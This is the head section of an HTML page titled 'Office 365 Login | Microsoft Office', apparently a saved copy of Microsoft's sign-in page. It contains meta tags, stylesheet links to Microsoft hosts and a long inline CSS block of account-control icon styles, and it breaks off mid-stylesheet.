<html dir="ltr" lang="en-US" class="js"><head>
    <title>Office 365 Login | Microsoft Office</title>
    <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex, nofollow">
        <meta name="description" content="Collaborate for free with online versions of Microsoft Word, PowerPoint, Excel, and OneNote. Save documents, spreadsheets, and presentations online, in OneDrive. Share them with others and work together at the same time.">
        <meta name="keywords" content="Microsoft Office Online, Collaborate, Free Office, %BRAND_WORD_WEB_APP%, %BRAND_OUTLOOK_DOT_COM%, %BRAND_OUTLOOK_SHORT%, %BRAND_ONEDRIVE%, Office Online, %BRAND_WORD_WEB_APPS%, %BRAND_POWERPOINT_WEB_APPS%, %BRAND_EXCEL_WEB_APPS%, %BRAND_ONENOTE_WEB_APPS%, Office templates, Office 365, Microsoft Office 365">
        <meta name="google-site-verification" content="2ha8r4M6dCCdv5bIEbwVgj31KQvTZ9fZll7L_Vly-mQ">
        <meta name="msvalidate.01" content="A219BD08BD3D60126A1DBA35BF6168E3">
        <meta name="ms.lang" content="en">
        <meta name="ms.loc" content="US">
        <meta name="awa-market" content="en-US">
        <meta name="ms.ocpub.assetid" content="UnauthOhp">
        <meta name="ms.env" content="prod">
        <meta name="ms.sitever" content="5">
        <meta name="awa-ver" content="5">
        <meta name="ms.flightid" content="projenabled|dimepwa|nativesearch|pwacommercialfrecf|msashellserv|pwafreeconsumerfrecf|bgedgeworth">

        <link rel="stylesheet" type="text/css" crossorigin="anonymous" href="https://blobs.officehome.msocdn.com/bundles/unauth-ae392b2ca9.css" integrity="sha256-bMF0SAzAuZz8R9sRr56zFJQJmtK39z2A9n0hXi/BIq4=">

    <link rel="stylesheet" type="text/css" crossorigin="anonymous" href="https://blobs.officehome.msocdn.com/bundles/sharedfontstyles-30d1fc43fd.css" integrity="sha256-TZSBU22/Owgj1SVLZmRmhzovV38SIqGa7IjNYVd4Hyw=">
    
    
    
    

    
    

<link rel="stylesheet" href="https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/f8-7a3c66/60-6300af/cc-4d3241/af-407700/d5-a3e17a/5a-86f975/75-d01c06/a2-53eae8?ver=2.0" type="text/css" media="all">


        

            
            
            
            
            
            
            
            
            

<style type="text/css">.mectrl_outlined{outline-style:dashed;outline-color:#777;outline-width:1px;outline-offset:-1px}.mectrl_resetStyle,a.mectrl_resetStyle,button.mectrl_resetStyle{border-style:none;border-width:0;padding:0;margin:0;outline-style:none!important;background-color:transparent;text-decoration:none;text-align:left;font-family:"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;cursor:pointer}.mectrl_dropdown{position:relative}.mectrl_dropdownbody{position:absolute;right:0;z-index:1000000;opacity:0;visibility:hidden;-webkit-transition:visibility 0s linear 120ms,opacity 120ms ease;transition:visibility 0s linear 120ms,opacity 120ms ease}.mectrl_dropdownbody.expanded{opacity:1;visibility:visible;-webkit-transition-delay:0s;transition-delay:0s}.mectrl_focus_visible :focus{outline-style:dashed!important;outline-color:#777!important;outline-width:1px!important;outline-offset:-1px!important}.mectrl_glyph{overflow:hidden;background-size:cover;background-position:center center;background-repeat:no-repeat}.glyph_more{width:24px;height:24px}.glyph_text{clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;width:1px;margin:-1px;overflow:hidden;padding:0;position:absolute}.glyph_signIn_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23707070'%3E%3Cg class='mectrl_stroke' stroke-width='1.9' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25'/%3E%3Cg transform='matrix(1.1 0 0 1.1 8.8 5.61)'%3E%3Ccircle class='mectrl_stroke' cx='20' cy='16' r='7'/%3E%3Cpath class='mectrl_stroke' d='M30 35h10m-5-5v10M30.833 32.09A11 11 0 009 34'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_aadAccount_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23707070' stroke='%23707070'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")}.glyph_account_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23707070'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_msft{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='108' height='23'%3E%3Cpath d='M44.836 4.6v13.8h-2.4V7.583H42.4L38.119 18.4h-1.588L32.142 7.583h-.028V18.4H29.9V4.6h3.436L37.3 14.83h.057L41.545 4.6zm2 1.049a1.268 1.268 0 01.419-.967 1.411 1.411 0 011-.39 1.392 1.392 0 011.02.4 1.3 1.3 0 01.405.957 1.249 1.249 0 01-.414.953 1.428 1.428 0 01-1.011.385A1.4 1.4 0 0147.25 6.6a1.263 1.263 0 01-.41-.949M49.41 18.4h-2.329V8.507h2.329zm7.064-1.694a3.225 3.225 0 001.145-.24 4.808 4.808 0 001.155-.636V18a4.659 4.659 0 01-1.266.481 6.9 6.9 0 01-1.554.163 4.707 4.707 0 01-4.918-4.907 5.644 5.644 0 011.4-3.932 5.054 5.054 0 013.955-1.545 5.42 5.42 0 011.324.169 4.4 4.4 0 011.063.39v2.232a4.73 4.73 0 00-1.1-.611 3.187 3.187 0 00-1.15-.217 2.918 2.918 0 00-2.223.9 3.366 3.366 0 00-.847 2.415 3.217 3.217 0 00.813 2.339 2.938 2.938 0 002.209.837m8.931-8.363a2.892 2.892 0 01.5.039 2.025 2.025 0 01.376.1v2.357a2.075 2.075 0 00-.535-.255 2.649 2.649 0 00-.851-.12 1.811 1.811 0 00-1.449.722 3.47 3.47 0 00-.592 2.223V18.4h-2.335V8.507h2.329v1.559h.039a2.731 2.731 0 01.962-1.266 2.615 2.615 0 011.55-.457m1 5.254a5.355 5.355 0 011.387-3.887 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.53 3.53 0 00.7 2.367 2.5 2.5 0 002.011.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.39 2.39 0 00-1.929-.813 2.441 2.441 0 00-1.988.852 3.707 3.707 0 00-.707 2.43m11.2-2.416a1 1 0 00.317.785 5.431 5.431 0 001.405.716 4.768 4.768 0 011.959 1.256 2.608 2.608 0 01.563 1.689 2.718 2.718 0 01-1.073 2.243 4.565 4.565 0 01-2.9.846 6.962 6.962 0 01-1.362-.149 6.036 6.036 0 01-1.265-.38v-2.29a5.74 5.74 0 001.367.7 4.009 4.009 0 001.328.26 2.37 2.37 0 001.164-.221.792.792 0 00.375-.741 1.027 1.027 0 00-.389-.813 5.772 5.772 0 00-1.478-.766 4.56 4.56 0 01-1.828-1.212 2.657 2.657 0 01-.539-1.713 2.706 2.706 0 011.063-2.2 4.245 4.245 0 012.764-.862 6.669 6.669 0 011.164.116 5.131 5.131 0 011.078.3v2.214a4.943 4.943 0 00-1.078-.53 3.61 3.61 0 00-1.222-.221 1.776 1.776 0 00-1.035.26.822.822 0 00-.37.712m5.241 2.493a5.355 5.355 0 011.386-3.89 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.535 3.535 0 00.7 2.367 2.506 2.506 0 002.012.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.391 2.391 0 00-1.93-.813 2.44 2.44 0 00-1.987.852 3.707 3.707 0 00-.707 2.43m15.464-3.109H99.7V18.4h-2.359v-7.988h-1.655V8.507h1.655V7.13a3.425 3.425 0 011.016-2.555 3.56 3.56 0 012.6-1 5.949 5.949 0 01.751.043 3.025 3.025 0 01.577.13v2.016a2.381 2.381 0 00-.4-.164 2.106 2.106 0 00-.664-.1 1.405 1.405 0 00-1.126.457 2.015 2.015 0 00-.395 1.356v1.194h3.469V6.283l2.338-.712v2.936h2.358v1.905h-2.358v4.629a1.954 1.954 0 00.332 1.29 1.329 1.329 0 001.045.375 1.569 1.569 0 00.486-.1 2.271 2.271 0 00.5-.231V18.3a2.765 2.765 0 01-.736.231 5.072 5.072 0 01-1.015.105 2.889 2.889 0 01-2.209-.784 3.341 3.341 0 01-.736-2.363z' fill='%23737373'/%3E%3Cpath fill='%23f25022' d='M0 0h10.931v10.931H0z'/%3E%3Cpath fill='%237fba00' d='M12.069 0H23v10.931H12.069z'/%3E%3Cpath fill='%2300a4ef' d='M0 12.069h10.931V23H0z'/%3E%3Cpath fill='%23ffb900' d='M12.069 12.069H23V23H12.069z'/%3E%3C/svg%3E")}.glyph_more{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 48 48' fill='%23707070'%3E%3Cg class='mectrl_fill'%3E%3Ccircle r='2' cx='12' cy='24'/%3E%3Ccircle r='2' cx='24' cy='24'/%3E%3Ccircle r='2' cx='36' cy='24'/%3E%3C/g%3E%3C/svg%3E")}.glyph_chevron{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='10' viewBox='0 3 16 10' fill='%23231F20'%3E%3Cg class='mectrl_fill'%3E%3Cpath d='M15.284 3.642l.716.716-8 8-8-8 .716-.716L8 10.926z'/%3E%3C/g%3E%3C/svg%3E")}@media not screen and (-ms-high-contrast:black-on-white){.c-uhfh>.theme-dark .c-me .glyph_msft,.mectrl_theme_azure_hcdark .glyph_msft,.mectrl_theme_dark .glyph_msft,.mectrl_theme_gray .glyph_msft,.mectrl_theme_off_black .glyph_msft{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='108' height='23'%3E%3Cpath d='M44.836 4.6v13.8h-2.4V7.583H42.4L38.119 18.4h-1.588L32.142 7.583h-.028V18.4H29.9V4.6h3.436L37.3 14.83h.057L41.545 4.6zm2 1.049a1.268 1.268 0 01.419-.967 1.411 1.411 0 011-.39 1.392 1.392 0 011.02.4 1.3 1.3 0 01.405.957 1.249 1.249 0 01-.414.953 1.428 1.428 0 01-1.011.385A1.4 1.4 0 0147.25 6.6a1.263 1.263 0 01-.41-.949M49.41 18.4h-2.329V8.507h2.329zm7.064-1.694a3.225 3.225 0 001.145-.24 4.808 4.808 0 001.155-.636V18a4.659 4.659 0 01-1.266.481 6.9 6.9 0 01-1.554.163 4.707 4.707 0 01-4.918-4.907 5.644 5.644 0 011.4-3.932 5.054 5.054 0 013.955-1.545 5.42 5.42 0 011.324.169 4.4 4.4 0 011.063.39v2.232a4.73 4.73 0 00-1.1-.611 3.187 3.187 0 00-1.15-.217 2.918 2.918 0 00-2.223.9 3.366 3.366 0 00-.847 2.415 3.217 3.217 0 00.813 2.339 2.938 2.938 0 002.209.837m8.931-8.363a2.892 2.892 0 01.5.039 2.025 2.025 0 01.376.1v2.357a2.075 2.075 0 00-.535-.255 2.649 2.649 0 00-.851-.12 1.811 1.811 0 00-1.449.722 3.47 3.47 0 00-.592 2.223V18.4h-2.335V8.507h2.329v1.559h.039a2.731 2.731 0 01.962-1.266 2.615 2.615 0 011.55-.457m1 5.254a5.355 5.355 0 011.387-3.887 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.53 3.53 0 00.7 2.367 2.5 2.5 0 002.011.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.39 2.39 0 00-1.929-.813 2.441 2.441 0 00-1.988.852 3.707 3.707 0 00-.707 2.43m11.2-2.416a1 1 0 00.317.785 5.431 5.431 0 001.405.716 4.768 4.768 0 011.959 1.256 2.608 2.608 0 01.563 1.689 2.718 2.718 0 01-1.073 2.243 4.565 4.565 0 01-2.9.846 6.962 6.962 0 01-1.362-.149 6.036 6.036 0 01-1.265-.38v-2.29a5.74 5.74 0 001.367.7 4.009 4.009 0 001.328.26 2.37 2.37 0 001.164-.221.792.792 0 00.375-.741 1.027 1.027 0 00-.389-.813 5.772 5.772 0 00-1.478-.766 4.56 4.56 0 01-1.828-1.212 2.657 2.657 0 01-.539-1.713 2.706 2.706 0 011.063-2.2 4.245 4.245 0 012.764-.862 6.669 6.669 0 011.164.116 5.131 5.131 0 011.078.3v2.214a4.943 4.943 0 00-1.078-.53 3.61 3.61 0 00-1.222-.221 1.776 1.776 0 00-1.035.26.822.822 0 00-.37.712m5.241 2.493a5.355 5.355 0 011.386-3.89 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.535 3.535 0 00.7 2.367 2.506 2.506 0 002.012.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.391 2.391 0 00-1.93-.813 2.44 2.44 0 00-1.987.852 3.707 3.707 0 00-.707 2.43m15.464-3.109H99.7V18.4h-2.359v-7.988h-1.655V8.507h1.655V7.13a3.425 3.425 0 011.016-2.555 3.56 3.56 0 012.6-1 5.949 5.949 0 01.751.043 3.025 3.025 0 01.577.13v2.016a2.381 2.381 0 00-.4-.164 2.106 2.106 0 00-.664-.1 1.405 1.405 0 00-1.126.457 2.015 2.015 0 00-.395 1.356v1.194h3.469V6.283l2.338-.712v2.936h2.358v1.905h-2.358v4.629a1.954 1.954 0 00.332 1.29 1.329 1.329 0 001.045.375 1.569 1.569 0 00.486-.1 2.271 2.271 0 00.5-.231V18.3a2.765 2.765 0 01-.736.231 5.072 5.072 0 01-1.015.105 2.889 2.889 0 01-2.209-.784 3.341 3.341 0 01-.736-2.363z' fill='%23fff'/%3E%3Cpath fill='%23f25022' d='M0 0h10.931v10.931H0z'/%3E%3Cpath fill='%237fba00' d='M12.069 0H23v10.931H12.069z'/%3E%3Cpath fill='%2300a4ef' d='M0 12.069h10.931V23H0z'/%3E%3Cpath fill='%23ffb900' d='M12.069 12.069H23V23H12.069z'/%3E%3C/svg%3E")}.c-uhfh>.theme-dark .c-me .glyph_signIn_circle,.mectrl_theme_azure_hcdark .glyph_signIn_circle,.mectrl_theme_dark .glyph_signIn_circle,.mectrl_theme_gray .glyph_signIn_circle,.mectrl_theme_off_black .glyph_signIn_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23fff'%3E%3Cg class='mectrl_stroke' stroke-width='1.9' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25'/%3E%3Cg transform='matrix(1.1 0 0 1.1 8.8 5.61)'%3E%3Ccircle class='mectrl_stroke' cx='20' cy='16' r='7'/%3E%3Cpath class='mectrl_stroke' d='M30 35h10m-5-5v10M30.833 32.09A11 11 0 009 34'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.c-uhfh>.theme-dark .c-me .glyph_aadAccount_circle,.mectrl_theme_azure_hcdark .glyph_aadAccount_circle,.mectrl_theme_dark .glyph_aadAccount_circle,.mectrl_theme_gray .glyph_aadAccount_circle,.mectrl_theme_off_black .glyph_aadAccount_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23fff' stroke='%23fff'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")}.c-uhfh>.theme-dark .c-me .glyph_account_circle,.mectrl_theme_azure_hcdark .glyph_account_circle,.mectrl_theme_dark .glyph_account_circle,.mectrl_theme_gray .glyph_account_circle,.mectrl_theme_off_black .glyph_account_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23fff'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.c-uhfh>.theme-dark .c-me .glyph_more,.mectrl_theme_azure_hcdark .glyph_more,.mectrl_theme_dark .glyph_more,.mectrl_theme_gray .glyph_more,.mectrl_theme_off_black .glyph_more{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 48 48' fill='%23fff'%3E%3Cg class='mectrl_fill'%3E%3Ccircle r='2' cx='12' cy='24'/%3E%3Ccircle r='2' cx='24' cy='24'/%3E%3Ccircle r='2' cx='36' cy='24'/%3E%3C/g%3E%3C/svg%3E")}.c-uhfh>.theme-dark .c-me .glyph_chevron,.mectrl_theme_azure_hcdark .glyph_chevron,.mectrl_theme_dark .glyph_chevron,.mectrl_theme_gray .glyph_chevron,.mectrl_theme_off_black .glyph_chevron{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='10' viewBox='0 3 16 10' fill='%23fff'%3E%3Cg class='mectrl_fill'%3E%3Cpath d='M15.284 3.642l.716.716-8 8-8-8 .716-.716L8 10.926z'/%3E%3C/g%3E%3C/svg%3E")}}@media screen and (-ms-high-contrast:white-on-black){.glyph_msft{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='108' height='23'%3E%3Cpath d='M44.836 4.6v13.8h-2.4V7.583H42.4L38.119 18.4h-1.588L32.142 7.583h-.028V18.4H29.9V4.6h3.436L37.3 14.83h.057L41.545 4.6zm2 1.049a1.268 1.268 0 01.419-.967 1.411 1.411 0 011-.39 1.392 1.392 0 011.02.4 1.3 1.3 0 01.405.957 1.249 1.249 0 01-.414.953 1.428 1.428 0 01-1.011.385A1.4 1.4 0 0147.25 6.6a1.263 1.263 0 01-.41-.949M49.41 18.4h-2.329V8.507h2.329zm7.064-1.694a3.225 3.225 0 001.145-.24 4.808 4.808 0 001.155-.636V18a4.659 4.659 0 01-1.266.481 6.9 6.9 0 01-1.554.163 4.707 4.707 0 01-4.918-4.907 5.644 5.644 0 011.4-3.932 5.054 5.054 0 013.955-1.545 5.42 5.42 0 011.324.169 4.4 4.4 0 011.063.39v2.232a4.73 4.73 0 00-1.1-.611 3.187 3.187 0 00-1.15-.217 2.918 2.918 0 00-2.223.9 3.366 3.366 0 00-.847 2.415 3.217 3.217 0 00.813 2.339 2.938 2.938 0 002.209.837m8.931-8.363a2.892 2.892 0 01.5.039 2.025 2.025 0 01.376.1v2.357a2.075 2.075 0 00-.535-.255 2.649 2.649 0 00-.851-.12 1.811 1.811 0 00-1.449.722 3.47 3.47 0 00-.592 2.223V18.4h-2.335V8.507h2.329v1.559h.039a2.731 2.731 0 01.962-1.266 2.615 2.615 0 011.55-.457m1 5.254a5.355 5.355 0 011.387-3.887 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.53 3.53 0 00.7 2.367 2.5 2.5 0 002.011.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.39 2.39 0 00-1.929-.813 2.441 2.441 0 00-1.988.852 3.707 3.707 0 00-.707 2.43m11.2-2.416a1 1 0 00.317.785 5.431 5.431 0 001.405.716 4.768 4.768 0 011.959 1.256 2.608 2.608 0 01.563 1.689 2.718 2.718 0 01-1.073 2.243 4.565 4.565 0 01-2.9.846 6.962 6.962 0 01-1.362-.149 6.036 6.036 0 01-1.265-.38v-2.29a5.74 5.74 0 001.367.7 4.009 4.009 0 001.328.26 2.37 2.37 0 001.164-.221.792.792 0 00.375-.741 1.027 1.027 0 00-.389-.813 5.772 5.772 0 00-1.478-.766 4.56 4.56 0 01-1.828-1.212 2.657 2.657 0 01-.539-1.713 2.706 2.706 0 011.063-2.2 4.245 4.245 0 012.764-.862 6.669 6.669 0 011.164.116 5.131 5.131 0 011.078.3v2.214a4.943 4.943 0 00-1.078-.53 3.61 3.61 0 00-1.222-.221 1.776 1.776 0 00-1.035.26.822.822 0 00-.37.712m5.241 2.493a5.355 5.355 0 011.386-3.89 5.1 5.1 0 013.85-1.434 4.741 4.741 0 013.623 1.381 5.208 5.208 0 011.3 3.729 5.259 5.259 0 01-1.385 3.83 5.02 5.02 0 01-3.773 1.424 4.931 4.931 0 01-3.652-1.352 4.984 4.984 0 01-1.349-3.688m2.426-.076a3.535 3.535 0 00.7 2.367 2.506 2.506 0 002.012.818 2.344 2.344 0 001.934-.818 3.78 3.78 0 00.664-2.425 3.649 3.649 0 00-.688-2.411 2.391 2.391 0 00-1.93-.813 2.44 2.44 0 00-1.987.852 3.707 3.707 0 00-.707 2.43m15.464-3.109H99.7V18.4h-2.359v-7.988h-1.655V8.507h1.655V7.13a3.425 3.425 0 011.016-2.555 3.56 3.56 0 012.6-1 5.949 5.949 0 01.751.043 3.025 3.025 0 01.577.13v2.016a2.381 2.381 0 00-.4-.164 2.106 2.106 0 00-.664-.1 1.405 1.405 0 00-1.126.457 2.015 2.015 0 00-.395 1.356v1.194h3.469V6.283l2.338-.712v2.936h2.358v1.905h-2.358v4.629a1.954 1.954 0 00.332 1.29 1.329 1.329 0 001.045.375 1.569 1.569 0 00.486-.1 2.271 2.271 0 00.5-.231V18.3a2.765 2.765 0 01-.736.231 5.072 5.072 0 01-1.015.105 2.889 2.889 0 01-2.209-.784 3.341 3.341 0 01-.736-2.363z' fill='%23fff'/%3E%3Cpath fill='%23f25022' d='M0 0h10.931v10.931H0z'/%3E%3Cpath fill='%237fba00' d='M12.069 0H23v10.931H12.069z'/%3E%3Cpath fill='%2300a4ef' d='M0 12.069h10.931V23H0z'/%3E%3Cpath fill='%23ffb900' d='M12.069 12.069H23V23H12.069z'/%3E%3C/svg%3E")}.glyph_signIn_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23fff'%3E%3Cg class='mectrl_stroke' stroke-width='1.9' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25'/%3E%3Cg transform='matrix(1.1 0 0 1.1 8.8 5.61)'%3E%3Ccircle class='mectrl_stroke' cx='20' cy='16' r='7'/%3E%3Cpath class='mectrl_stroke' d='M30 35h10m-5-5v10M30.833 32.09A11 11 0 009 34'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_aadAccount_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23fff' stroke='%23fff'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")}.glyph_account_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23fff'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' stroke-width='1.5'/%3E%3Cg transform='matrix(.9 0 0 .9 10.431 10.431)' stroke-width='2'%3E%3Ccircle cx='24.25' cy='18' r='9'/%3E%3Cpath d='M11.2 40a1 1 0 1126.1 0'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_more{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 48 48' fill='%23fff'%3E%3Cg class='mectrl_fill'%3E%3Ccircle r='2' cx='12' cy='24'/%3E%3Ccircle r='2' cx='24' cy='24'/%3E%3Ccircle r='2' cx='36' cy='24'/%3E%3C/g%3E%3C/svg%3E")}.glyph_chevron{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='16' height='10' viewBox='0 3 16 10' fill='%23fff'%3E%3Cg class='mectrl_fill'%3E%3Cpath d='M15.284 3.642l.716.716-8 8-8-8 .716-.716L8 10.926z'/%3E%3C/g%3E%3C/svg%3E")}}@media screen and (-ms-high-contrast:black-on-white){.glyph_text{clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;width:1px;margin:-1px;overflow:hidden;padding:0;position:absolute}.glyph_signIn_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23707070'%3E%3Cg class='mectrl_stroke' stroke-width='1.9' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25'/%3E%3Cg transform='matrix(1.1 0 0 1.1 8.8 5.61)'%3E%3Ccircle class='mectrl_stroke' cx='20' cy='16' r='7'/%3E%3Cpath class='mectrl_stroke' d='M30 35h10m-5-5v10M30.833 32.09A11 11 0 009 34'/%3E%3C/g%3E%3C/g%3E%3C/svg%3E")}.glyph_aadAccount_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' fill='%23707070' stroke='%23707070'%3E%3Ccircle class='mectrl_stroke' cx='32' cy='32' r='30.25' stroke-width='1.5' fill='none'/%3E%3Cg class='mectrl_stroke' fill='none' stroke-width='2.5' transform='matrix(.9 0 0 .9 10.4 10.4)'%3E%3Crect x='13.3' y='12.3' width='21.4' height='28.5' rx='.6' ry='.6'/%3E%3Ccircle cy='25.4' cx='24' r='3.6'/%3E%3Cpath d='M18 35a1 1 0 1112 0'/%3E%3C/g%3E%3Cg class='mectrl_fill' stroke='none'%3E%3Cpath d='M36.68 14h2.34l-3.24 6.75h-2.43zM24.89 14h2.43l5.58 11.25a1.046 1.046 0 01-1.791 1.08l-.549-1.08z'/%3E%3C/g%3E%3C/svg%3E")}.glyph_account_circle{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 64 64' stroke='%23707070'%3E%3Cg class='mectrl_stroke' fill='none'%3E%3Ccircle cx='32' cy='32' r='30.25' 